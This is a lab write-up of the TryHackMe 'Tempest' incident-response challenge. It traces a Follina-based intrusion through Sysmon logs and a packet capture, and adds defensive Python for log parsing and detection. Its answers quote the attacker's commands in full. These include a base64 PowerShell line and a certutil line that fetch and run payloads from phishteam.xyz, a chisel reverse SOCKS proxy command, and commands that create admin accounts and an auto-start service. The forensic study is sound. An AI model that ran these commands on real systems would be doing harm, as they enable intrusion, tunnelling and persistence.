TryHackMe: Tempest

Overview

In this challenge we will analyze Sysmon logs and a PCAP to uncover the actions taken by a threat actor across several stages of the Cyber Kill Chain.


Scenario

In this incident, you will act as an Incident Responder picking up an alert triaged by one of your Security Operations Center analysts. The analyst has confirmed that the alert has CRITICAL severity and needs further investigation.

As reported by the SOC analyst, the intrusion started from a malicious document. In addition, the analyst compiled the essential information generated by the alert as listed below:

  • The malicious document has a .doc extension.
  • The user downloaded the malicious document via chrome.exe.
  • The malicious document then executed a chain of commands to attain code execution.

Getting Started

We’ll prepare by parsing the event logs with EvtxECmd.

The command syntax is EvtxECmd.exe -f <filename> --csv <output directory> --csvf <output filename>

Note: For this challenge, EvtxECmd.exe is located in C:\Tools\EvtxECmd; you will need to navigate to this path or provide the full path when executing the command.

We’ll parse both logs now so that we’re ready for analysis later.

parsing Sysmon.evtx with EvtxECmd

Q1

The user of this machine was compromised by a malicious document. What is the file name of the document?

We were provided with some significant starting points in our briefing.

We were told that the malicious document has a .doc extension, was downloaded by Chrome, and executed commands. We will use this information to track down the document and start our investigation.

With the parsed Sysmon logs opened in Timeline Explorer, we can filter for file creation events originating from Chrome.

To do this, we’ll filter for Sysmon Event ID 11 (FileCreate) and an Image containing chrome. Note: In the EvtxECmd output these are the Event Id and Payload Data3 columns respectively.

filtering for event code 11 and Chrome

Only two events match our filters, and one of them is the Zone.Identifier alternate data stream of a .doc file. That stream is the Mark-of-the-Web Chrome writes next to every download, so it names the document for us.

.doc file in results

Answer free_magicules.doc

Q2

What is the name of the compromised user and machine?

Format: username-machine name

The user name and machine name are present in our current filtered results.

Machine and User names

Answer benimaru-TEMPEST

Q3

What is the PID of the Microsoft Word process that opened the malicious document?

To find the PID, we will filter for Event ID 1 (process creation) and an Image containing winword.

filtering for process creation, winword

With our filters in place, there is only one result.

Commandline of WinWord opening the malicious document

We can find the PID in the Payload Data1 column.

PID

Answer 496

Q4

Based on Sysmon logs, what is the IPv4 address resolved by the malicious domain used in the previous question?

Sysmon Event ID 22 logs DNS queries together with their answers. Filtering on this event code and the PID shows which domains the process resolved and what each one resolved to.

We’ll filter for Event ID 22 and PID 496.

Filtering for EventID 22 and PID 496

The results show queries for office.com domains and a suspicious phishteam.xyz domain.

phishteam.xyz DNS query and answer

Answer 167.71.199.191

Q5

What is the base64 encoded string in the malicious payload executed by the document?

We’ll pivot now and search for process creations that are children of the Word process we discovered earlier.

To do this, we’ll set the Event ID to 1 and the parent process ID to 496.

Process creations created by the Word process

In our results, we can see one very long and obfuscated command.

obfuscated command run as a child of PID 496

Decoding the base64 reveals a PowerShell command that changes into the user’s Startup folder, downloads update.zip from phishteam.xyz, extracts it there, and deletes the archive, so whatever the archive contained runs at every logon.

Decoded base64 command

Answer JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg
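The Q1 to Q5 pivots (file drop by Chrome, the Word process that opened it, its DNS answers, its children, and the base64 blob in the child command line) can be scripted instead of clicked through in Timeline Explorer. The following is an added example written for this write-up, not code from the room or from any tool it uses. It works on Sysmon records in the XML layout Sysmon writes to the event log; the document name, PID 496, the phishteam.xyz answer and the base64 string are the values reported above, while every other PID, path, the decoy DNS record and the msdt.exe wrapper are invented for the example. Two caveats the page glosses over are handled: Sysmon logs the Zone.Identifier stream as its own FileCreate, and the blob as printed has no base64 padding, which CyberChef tolerates and Python does not.

```python
import base64
import binascii
import re
import xml.etree.ElementTree as ET

# Constructed Sysmon records in the <EventData><Data Name=...> layout Sysmon
# writes to the event log. Only the fields the pivots need are present. The
# document name, PID 496, the phishteam.xyz resolution and the base64 blob are
# the values from the write-up; every other PID, path, the decoy DNS record
# and the msdt.exe wrapper are invented for this example.
SYSMON_XML = r"""<Events>
<Event><System><EventID>11</EventID></System><EventData>
 <Data Name="ProcessId">3080</Data><Data Name="Image">C:\Program Files\Google\Chrome\Application\chrome.exe</Data>
 <Data Name="TargetFilename">C:\Users\benimaru\Downloads\free_magicules.doc</Data></EventData></Event>
<Event><System><EventID>11</EventID></System><EventData>
 <Data Name="ProcessId">3080</Data><Data Name="Image">C:\Program Files\Google\Chrome\Application\chrome.exe</Data>
 <Data Name="TargetFilename">C:\Users\benimaru\Downloads\free_magicules.doc:Zone.Identifier</Data></EventData></Event>
<Event><System><EventID>1</EventID></System><EventData>
 <Data Name="ProcessId">496</Data><Data Name="ParentProcessId">5000</Data>
 <Data Name="Image">C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE</Data>
 <Data Name="CommandLine">"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\benimaru\Downloads\free_magicules.doc"</Data></EventData></Event>
<Event><System><EventID>22</EventID></System><EventData>
 <Data Name="ProcessId">496</Data><Data Name="QueryName">www.office.com</Data><Data Name="QueryResults">::ffff:203.0.113.10;</Data></EventData></Event>
<Event><System><EventID>22</EventID></System><EventData>
 <Data Name="ProcessId">496</Data><Data Name="QueryName">phishteam.xyz</Data><Data Name="QueryResults">::ffff:167.71.199.191;</Data></EventData></Event>
<Event><System><EventID>1</EventID></System><EventData>
 <Data Name="ProcessId">5100</Data><Data Name="ParentProcessId">496</Data><Data Name="Image">C:\Windows\System32\msdt.exe</Data>
 <Data Name="CommandLine">"C:\Windows\System32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_BrowseForFile=$([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg')))"</Data></EventData></Event>
</Events>"""


def _local(tag):
    """Strip the XML namespace that real .evtx exports carry on every tag."""
    return tag.rsplit("}", 1)[-1]


def parse_sysmon(xml_text):
    """Flatten each <Event> into a dict: EventID plus its EventData fields."""
    events = []
    for ev in ET.fromstring(xml_text).iter():
        if _local(ev.tag) != "Event":
            continue
        rec = {}
        for el in ev.iter():
            if _local(el.tag) == "EventID":
                rec["EventID"] = int(el.text)
            elif _local(el.tag) == "Data" and el.get("Name"):
                rec[el.get("Name")] = el.text or ""
        events.append(rec)
    return events


EVENTS = parse_sysmon(SYSMON_XML)


def files_dropped_by(events, image_substr, ext):
    """Event ID 11 written by a process whose Image contains image_substr.
    The Zone.Identifier ADS is logged as a separate FileCreate, so strip the
    ':Zone.Identifier' suffix before matching the extension."""
    found = set()
    for e in events:
        if e["EventID"] != 11 or image_substr.lower() not in e["Image"].lower():
            continue
        path = re.sub(r":Zone\.Identifier$", "", e["TargetFilename"])
        if path.lower().endswith(ext):
            found.add(path)
    return found


def opener_pid(events, filename):
    """PID of the first Event ID 1 whose command line references filename."""
    for e in events:
        if e["EventID"] == 1 and filename.lower() in e.get("CommandLine", "").lower():
            return e["ProcessId"]
    return None


def dns_for_pid(events, pid):
    """Event ID 22 queries by pid -> [(QueryName, [IPv4 answers])].
    QueryResults packs IPv4 answers as '::ffff:<ip>;' entries."""
    return [(e["QueryName"], re.findall(r"\d{1,3}(?:\.\d{1,3}){3}", e["QueryResults"]))
            for e in events if e["EventID"] == 22 and e["ProcessId"] == pid]


def children_of(events, pid):
    """Event ID 1 records whose ParentProcessId is pid."""
    return [e for e in events if e["EventID"] == 1 and e.get("ParentProcessId") == pid]


B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_b64_blobs(text):
    """Decode every long base64 run in a command line. Missing '=' padding is
    restored first (Python rejects it, CyberChef does not). '-EncodedCommand'
    payloads are UTF-16LE; detect the interleaved NULs, otherwise use UTF-8."""
    decoded = []
    for run in B64_RUN.findall(text):
        padded = run + "=" * (-len(run) % 4)
        try:
            raw = base64.b64decode(padded, validate=True)
        except binascii.Error:
            continue
        codec = "utf-16-le" if len(raw) >= 4 and all(b == 0 for b in raw[1:20:2]) else "utf-8"
        decoded.append(raw.decode(codec, errors="replace"))
    return decoded


if __name__ == "__main__":
    pid = opener_pid(EVENTS, "free_magicules.doc")
    print("document:", files_dropped_by(EVENTS, "chrome.exe", ".doc"))
    print("winword pid:", pid, "dns:", dns_for_pid(EVENTS, pid))
    for child in children_of(EVENTS, pid):
        print("child:", child["Image"])
        for cmd in decode_b64_blobs(child["CommandLine"]):
            print("decoded:", cmd.strip())
```

Against a real export, feed parse_sysmon the XML of the Sysmon channel (for example from Get-WinEvent ... | ForEach-Object ToXml wrapped in a root element); the namespace-stripping in _local is what makes that work unchanged.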

Q6

What is the CVE number of the exploit used by the attacker to achieve a remote code execution?

The child process is msdt.exe (the Microsoft Support Diagnostic Tool), launched from a Word document through the ms-msdt: protocol handler. That combination is the Follina vulnerability, and searching for it leads to the CVE in question.

Answer 2022-30190

Q7

The malicious execution of the payload wrote a file on the system. What is the full target path of the payload?

We saw the destination folder and file name in the decoded command from Q5, but we can confirm it by filtering for Event ID 11 and target filenames that contain zip.

filtering for file creation, zip

As expected, update.zip was created in the user’s Startup directory.

The full file path of the malicious zip

Answer C:\Users\benimaru\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.zip

Q8

The implanted payload executes once the user logs into the machine. What is the executed command upon a successful login of the compromised user?

Items in the Startup folder are launched by explorer.exe when the user logs on, so the autostart payload will appear as a process creation with Explorer as its parent. We can filter for Event ID 1 events whose parent image is explorer.exe.

Filtering for processes started by Explorer.

Within the results, we can see powershell execution including the previously discovered malicious domain and another executable.

PowerShell execution downloading another malicious executable

Answer C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -noni certutil -urlcache -split -f 'http://phishteam.xyz/02dcf07/first.exe' C:\Users\Public\Downloads\first.exe; C:\Users\Public\Downloads\first.exe

Q9

Based on Sysmon logs, what is the SHA256 hash of the malicious binary downloaded for stage 2 execution?

We know this executable was saved as C:\Users\Public\Downloads\first.exe, so we’ll filter for process creation events containing this name.

Process Creation, containing first.exe

The results show the stages of the previously discovered command (the PowerShell wrapper, certutil, and finally first.exe itself). We want the hash of the executable, so we look at the Event ID 1 record whose Image is first.exe; Sysmon records the hashes in that event.

Stages of command execution

Hashes

Answer CE278CA242AA2023A4FE04067B0A32FBD3CA1599746C160949868FFC7FC3D7D8

Q10

The stage 2 payload downloaded establishes a connection to a c2 server. What is the domain and port used by the attacker?

With this new process discovered, we’ll pivot on its PID to learn more about its behavior.

filtering for first.exe's PID

The results for the PID reveal multiple network connections (Event ID 3) and DNS requests (Event ID 22).

The IP address resolved for these connections and queries was 167.71.222.162 and the domain was resolvecyber.xyz.

To discover the port we can use Wireshark and filter for this IP address.

Wireshark, filtered for the C2 IP

We can see that the communications are going to port 80, but we’ll check for any other ports by opening Statistics > Conversations in Wireshark. Note: Be sure to check the “Limit to display filter” box so only the filtered C2 traffic is counted.

Ports used

The conversations show traffic on ports 80 and 8080; for now we’re only concerned with port 80, which carries the first C2 channel.

We can further confirm that it is port 80 by comparing the Sysmon execution timestamps of first.exe with the timestamps of the packets.

Comparing timestamps

Answer resolvecyber.xyz:80

Q11

What is the URL of the malicious payload embedded in the document?

The document itself was downloaded first; the payload embedded in the document is the URL the document fetches once it is opened, so we want the first request to phishteam.xyz that follows the download of free_magicules.doc.

To do this we’ll filter Wireshark for GET requests to the phishteam.xyz domain.

We can specify the host with the filter http.host == "phishteam.xyz", or combine it with the method: http.request.method == "GET" && http.host == "phishteam.xyz"

Filtering Wireshark for GET requests to phishteam.xyz

We can see the request that downloaded the malicious document, followed by a request to index.html. That page is what the document loads to kick off the msdt.exe chain from Q5 and Q6.

Answer http://phishteam.xyz/02dcf07/index.html

Q12

What is the encoding used by the attacker on the c2 connection?

Looking at the C2 traffic, the beacon communicates through GET requests to the malicious web server.

A GET request from the victim machine to the malicious server

The requests appear to be base64 encoded, so we’ll try decoding one of them in CyberChef to see what we uncover.

Decoded GET request

And, with CyberChef’s From Base64 operation, we’ve confirmed that the requests are base64 encoded.

Answer base64

Q13

The malicious c2 binary sends a payload using a parameter that contains the executed command results. What is the parameter used by the binary?

Looking at the GET requests, the base64 string is the value of the query-string parameter “q”.

Answer q

Q14

The malicious c2 binary connects to a specific URL to get the command to be executed. What is the URL used by the binary?

We’ve seen that the GET requests go to the /9ab62b5 endpoint: the requests that carry q return command output (Q13), and the bare requests to the same path fetch the next command. We can confirm this by filtering Wireshark to show only GET requests (http.request.method == "GET").

GET requests to the endpoint

Answer /9ab62b5

Q15

What is the HTTP method used by the binary?

We’ve already discovered this in the previous questions.

Answer GET

Q16

Based on the user agent, what programming language was used by the attacker to compile the binary?

We can check the user-agent in Wireshark.

User-agent set in one of the many GET requests

Answer nim

Q17

The attacker was able to discover a sensitive file inside the machine of the user. What is the password discovered on the aforementioned file?

We can filter Wireshark for frames containing command output from the victim with frame contains "?q=". This is a byte-level match on the raw frame, so it also catches requests that Wireshark did not dissect as HTTP.

Wireshark filtered for only command results.

Decoding the various requests reveals numerous activities by the attacker. One of them, however, shows the contents of an automation script that contains the user’s password.

Automation script, containing user credentials

Answer infernotempest
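The decoding work in Q12 to Q17 (spot the base64, find the parameter, separate tasking polls from result uploads, read the User-Agent, then grep the decoded output) is repetitive by hand, so here it is as an added example, not code from the room or from the attacker’s tooling. It reads the tab-separated export that tshark produces for HTTP requests; the host, endpoint and parameter name are the ones identified above, while the frame numbers, command output, password placeholder and User-Agent version string are invented. It also handles a client that percent-encodes the base64 alphabet, and it deliberately uses unquote rather than unquote_plus, because the latter turns a literal ‘+’ (a base64 character) into a space and silently corrupts the blob.

```python
import base64
import binascii
from urllib.parse import quote, unquote, urlsplit

# Constructed export in the shape produced by
#   tshark -r capture.pcap -Y http.request -T fields -E separator=/t \
#     -e frame.number -e http.request.method -e http.host -e http.request.uri -e http.user_agent
# Host, endpoint and parameter name are those identified in the write-up; frame
# numbers, command output, the password placeholder and the User-Agent version
# string are invented for this example.
def _b64(text):
    return base64.b64encode(text.encode()).decode()


UA = "Nim httpclient/1.6.6"  # constructed; only the 'Nim' token is relied on
SAMPLE_TSV = "\n".join([
    "\t".join(["101", "GET", "resolvecyber.xyz", "/9ab62b5", UA]),  # poll for tasking
    "\t".join(["102", "GET", "resolvecyber.xyz",
               "/9ab62b5?q=" + _b64("whoami\r\ntempest\\benimaru\r\n"), UA]),
    "\t".join(["103", "GET", "resolvecyber.xyz", "/9ab62b5", UA]),
    "\t".join(["104", "GET", "resolvecyber.xyz",
               "/9ab62b5?q=" + _b64("type automation.ps1\r\n$pass = 'example-not-the-lab-value'\r\n"), UA]),
    # some clients percent-encode '+', '/' and '=' in the base64 value
    "\t".join(["105", "GET", "resolvecyber.xyz",
               "/9ab62b5?q=" + quote(_b64("netstat -ano\r\n  TCP  0.0.0.0:5985  0.0.0.0:0  LISTENING  4\r\n"), safe=""), UA]),
])


def parse_export(tsv):
    """One dict per request: frame, method, host, path, query params, UA."""
    rows = []
    for line in tsv.splitlines():
        if not line.strip():
            continue
        frame, method, host, uri, ua = line.split("\t")
        parts = urlsplit(uri)
        params = {}
        for kv in (parts.query.split("&") if parts.query else []):
            key, _, value = kv.partition("=")      # split on the first '=' only: base64 padding follows
            params[key] = unquote(value)           # unquote, not unquote_plus: '+' is base64 alphabet
        rows.append({"frame": int(frame), "method": method, "host": host,
                     "path": parts.path, "params": params, "ua": ua})
    return rows


def b64_decode_lenient(value):
    """Decode base64 that may lack padding or have had '+' mangled to ' '."""
    value = value.strip().replace(" ", "+")
    value += "=" * (-len(value) % 4)
    return base64.b64decode(value, validate=True).decode("utf-8", errors="replace")


def summarize_c2(rows, host):
    """Split a beacon's requests into tasking polls (no parameters) and
    result uploads (parameters whose value decodes as base64)."""
    c2 = [r for r in rows if r["host"] == host]
    results = []
    for r in c2:
        for name, value in r["params"].items():
            try:
                results.append((r["frame"], name, b64_decode_lenient(value)))
            except (binascii.Error, UnicodeDecodeError):
                pass
    return {
        "methods": sorted({r["method"] for r in c2}),
        "tasking_urls": sorted({r["path"] for r in c2 if not r["params"]}),
        "result_params": sorted({name for _, name, _ in results}),
        "user_agents": sorted({r["ua"] for r in c2}),
        "results": results,
    }


def grep_results(results, needle):
    """Frames whose decoded output mentions needle (case-insensitive)."""
    return [(frame, text) for frame, _, text in results if needle.lower() in text.lower()]


if __name__ == "__main__":
    summary = summarize_c2(parse_export(SAMPLE_TSV), "resolvecyber.xyz")
    for key in ("methods", "tasking_urls", "result_params", "user_agents"):
        print(key, summary[key])
    for frame, text in grep_results(summary["results"], "pass"):
        print(frame, text.strip())
```

On the real capture, generate the TSV with the tshark command in the comment and pass it to parse_export; grep_results with "pass", "5985" or "ch.exe" then lands on the frames behind Q17, Q18 and Q19 without decoding each request by hand.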

Q18

The attacker then enumerated the list of listening ports inside the machine. What is the listening port that could provide a remote shell inside the machine?

Among the commands decoded from the packet capture is a netstat command whose output lists the ports listening on the host.

Netstat command listing ports

Port 5985 is WinRM over HTTP. With valid credentials it provides an interactive remote PowerShell session (for example via Enter-PSSession or evil-winrm), which is the remote shell the question is asking about.

Answer 5985

Q19

The attacker then established a reverse socks proxy to access the internal services hosted inside the machine. What is the command executed by the attacker to establish the connection?

Another command discovered within the C2 traffic downloaded an executable named ch.exe.

PowerShell command to download a file named ch.exe

We’ll pivot and search our Sysmon logs for any process execution including this executable.

Filtering for process creation and ch.exe

There are only two results for this query, and one clearly shows a reverse SOCKS proxy being established: the client connects out to the attacker on port 8080, and the R:socks remote exposes a SOCKS listener on the attacker’s side that is tunnelled back into the victim’s network.

ch.exe opening a reverse socks proxy

Answer C:\Users\benimaru\Downloads\ch.exe client 167.71.199.191:8080 R:socks

Q20

What is the SHA256 hash of the binary used by the attacker to establish the reverse socks proxy connection?

We can locate the hashes of the executable within the current Timeline Explorer results; Sysmon records them in the Hashes field of the process creation event.

Answer 8A99353662CCAE117D2BB22EFD8C43D7169060450BE413AF763E8AD7522D2451

Q21

What is the name of the tool used by the attacker based on the SHA256 hash? Provide the answer in lowercase.

A quick search for the hash on VirusTotal reveals the executable is chisel.exe.

VirusTotal results

Answer chisel

Q22

The attacker then used the harvested credentials from the machine. Based on the succeeding process after the execution of the socks proxy, what service did the attacker use to authenticate?

We can check for process creation events occurring after the ch.exe began the socks proxy.

The process that immediately follows ch.exe is wsmprovhost.exe.

Commands following ch.exe

wsmprovhost.exe is the WinRM plugin host that Windows spawns for each remote PowerShell session, so its appearance right after the proxy came up means the attacker authenticated over WinRM (TCP 5985) through the SOCKS tunnel. This lines up with the listening port found in Q18.

Answer winrm

Q23

After discovering the privileges of the current user, the attacker then downloaded another binary to be used for privilege escalation. What is the name and the SHA256 hash of the binary?

Filtering for file creation events that took place around the time of the reverse socks proxy, we see an executable created in the Downloads directory.

Suspicious executable

Filtering for process creations containing the executable name shows that this binary was used to launch another file named final.exe.

spf.exe execution

We can find the hashes within these results.

Answer spf.exe,8524FBC0D73E711E69D60C64F1F1B7BEF35C986705880643DD4D5E17779E586D

Q24

Based on the SHA256 hash of the binary, what is the name of the tool used?

We can search for this hash on VirusTotal to find the binary’s real name.

Answer printspoofer


Q25

The tool exploits a specific privilege owned by the user. What is the name of the privilege?

The tool’s README explains how it works: a process holding SeImpersonatePrivilege coerces the print spooler into connecting to a named pipe it controls and then impersonates the resulting SYSTEM token. https://github.com/itm4n/PrintSpoofer

Answer SeImpersonatePrivilege

Q26

Then, the attacker executed the tool with another binary to establish a c2 connection. What is the name of the binary?

We already discovered this execution in Q23.

Answer final.exe

Q27

The binary connects to a different port from the first c2 connection. What is the port used?

We discovered this earlier when reviewing the Conversations in the PCAP (Q10).

Answer 8080

Q28

Upon achieving SYSTEM access, the attacker then created two users. What are the account names?

We know the attacker has SYSTEM access and that the final stage of their malware is named final.exe.

Using this information we will filter Timeline Explorer to see relevant command execution.

Filtering for process creations by the SYSTEM user, with the final.exe executable as its parent

Command execution by final.exe

We can see in the filtered results that two users were created, shion and shuna.

Answer shion,shuna


Q29

Prior to the successful creation of the accounts, the attacker executed commands that failed in the creation attempt. What is the missing option that made the attempt fail?

Looking through the results we see that the attacker first ran net user <name> <password> without the /add switch. Without /add, that syntax tries to set the password of an existing account, so it fails because the account doesn’t exist yet.

failed commands

Answer /add

Q30

Based on windows event logs, the accounts were successfully created. What is the event ID that indicates the account creation activity?

The Security log records each new local account as Event ID 4720, “A user account was created”.

One useful resource for checking the meaning of IDs and their various field is https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/

Answer 4720

Q31

The attacker added one of the accounts in the local administrator’s group. What is the command used by the attacker?

The command is within the filtered output we’ve been analyzing. The /add switch precedes the member name here rather than following it, but net.exe accepts it in that position, and the 4732 event in the next question confirms the addition succeeded.

Answer net localgroup administrators /add shion

Q32

Based on windows event logs, the account was successfully added to a sensitive group. What is the event ID that indicates the addition to a sensitive local group?

Adding a member to a security-enabled local group is recorded as Event ID 4732, “A member was added to a security-enabled local group”; see https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/

Answer 4732

Q33

After the account creation, the attacker executed a technique to establish persistent administrative access. What is the command executed by the attacker to achieve this?

This command is within the filtered output we’ve been analyzing: a new service, TempestUpdate2, whose binary is the C2 implant and which is set to start automatically, so the attacker’s SYSTEM access comes back on every boot. Note the sc.exe \\TEMPEST form targets the host by name, and that sc.exe requires the space after binpath= and start=.

Answer C:\Windows\system32\sc.exe \\TEMPEST create TempestUpdate2 binpath= C:\ProgramData\final.exe start= auto
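The post-exploitation steps in Q28 to Q33 map onto three detections a SOC would want to run rather than find by hand: a freshly created account (4720) added to Administrators (4732) shortly afterwards, a net user call missing /add, and an sc create service pointing outside the usual program directories. The code below is an added example for this write-up, not code from the room. It runs over already-parsed event records; the account names, the group, the net and sc command lines and the service name are those reported above, while the timestamps, SIDs, password placeholder and the SYSTEM user string are invented. It correlates on SID rather than name because 4732 commonly logs MemberName as “-” and only the SID is reliable.

```python
import re
from datetime import datetime, timedelta

# Constructed, already-parsed event records (Security log 4720/4732 and
# Sysmon Event ID 1). Account names, group, command lines and the service name
# are those from the write-up; timestamps, SIDs, the password placeholder and
# the user string are invented for this example.
ADMINS_SID = "S-1-5-32-544"  # well-known SID of BUILTIN\Administrators
SID_SHION = "S-1-5-21-111111111-222222222-333333333-1001"
SID_SHUNA = "S-1-5-21-111111111-222222222-333333333-1002"
SYSTEM = "NT AUTHORITY\\SYSTEM"
RECORDS = [
    {"time": "2022-06-20T18:00:00", "log": "Sysmon", "id": 1, "User": SYSTEM,
     "CommandLine": "net user shion P@ssw0rd-example"},            # no /add: fails
    {"time": "2022-06-20T18:00:05", "log": "Sysmon", "id": 1, "User": SYSTEM,
     "CommandLine": "net user shuna P@ssw0rd-example"},            # no /add: fails
    {"time": "2022-06-20T18:00:30", "log": "Sysmon", "id": 1, "User": SYSTEM,
     "CommandLine": "net user shion P@ssw0rd-example /add"},
    {"time": "2022-06-20T18:00:30", "log": "Security", "id": 4720,
     "TargetUserName": "shion", "TargetSid": SID_SHION},
    {"time": "2022-06-20T18:00:40", "log": "Sysmon", "id": 1, "User": SYSTEM,
     "CommandLine": "net user shuna P@ssw0rd-example /add"},
    {"time": "2022-06-20T18:00:40", "log": "Security", "id": 4720,
     "TargetUserName": "shuna", "TargetSid": SID_SHUNA},
    {"time": "2022-06-20T18:01:10", "log": "Sysmon", "id": 1, "User": SYSTEM,
     "CommandLine": "net localgroup administrators /add shion"},
    {"time": "2022-06-20T18:01:10", "log": "Security", "id": 4732,
     "TargetUserName": "Administrators", "TargetSid": ADMINS_SID,
     "MemberName": "-", "MemberSid": SID_SHION},
    {"time": "2022-06-20T18:02:00", "log": "Sysmon", "id": 1, "User": SYSTEM,
     "CommandLine": r"C:\Windows\system32\sc.exe \\TEMPEST create TempestUpdate2 binpath= C:\ProgramData\final.exe start= auto"},
]


def _t(rec):
    return datetime.fromisoformat(rec["time"])


def new_local_admins(records, window=timedelta(hours=1)):
    """Pair each 4732 into BUILTIN\\Administrators with the 4720 that created
    the member within `window`. Correlate on SID: MemberName is often '-'."""
    created = {r["TargetSid"]: r for r in records if r["id"] == 4720}
    hits = []
    for r in records:
        if r["id"] != 4732 or r.get("TargetSid") != ADMINS_SID:
            continue
        c = created.get(r.get("MemberSid"))
        if c and timedelta(0) <= _t(r) - _t(c) <= window:
            hits.append({"account": c["TargetUserName"], "created": c["time"], "added": r["time"]})
    return hits


SC_CREATE = re.compile(r"\bsc(?:\.exe)?\s+(?:\\\\\S+\s+)?create\s+(\S+)\s+(.*)", re.I)
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files")


def suspicious_services(records):
    """sc create with start= auto whose binary lives outside trusted roots.
    Handles the optional \\\\host argument and the mandatory space after '='."""
    out = []
    for r in records:
        m = SC_CREATE.search(r.get("CommandLine", ""))
        if not m:
            continue
        name, args = m.group(1), m.group(2)
        binpath = re.search(r"binpath=\s*(\S+)", args, re.I)
        start = re.search(r"start=\s*(\S+)", args, re.I)
        path = binpath.group(1).strip('"').lower() if binpath else ""
        if start and start.group(1).lower() == "auto" and not path.startswith(TRUSTED_ROOTS):
            out.append({"name": name, "binpath": binpath.group(1), "start": "auto"})
    return out


NET_USER = re.compile(r"\bnet(?:\.exe)?\s+user\s+(\S+)\s+(\S+).*", re.I)


def net_user_without_add(records):
    """'net user <name> <password>' without /add resets an existing account's
    password and fails for a name that does not exist: the attacker's slip."""
    out = []
    for r in records:
        m = NET_USER.search(r.get("CommandLine", ""))
        if m and "/add" not in m.group(0).lower():
            out.append({"account": m.group(1), "time": r["time"]})
    return out


if __name__ == "__main__":
    print("new local admins:", new_local_admins(RECORDS))
    print("auto-start services outside trusted roots:", suspicious_services(RECORDS))
    print("net user without /add:", net_user_without_add(RECORDS))
```

The one-hour window in new_local_admins is a tuning choice: the attacker here took about forty seconds between creation and group addition, but legitimate provisioning scripts do the same two steps within milliseconds, so pair this rule with the SubjectUserName (SYSTEM or an unexpected account) before alerting.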

Conclusion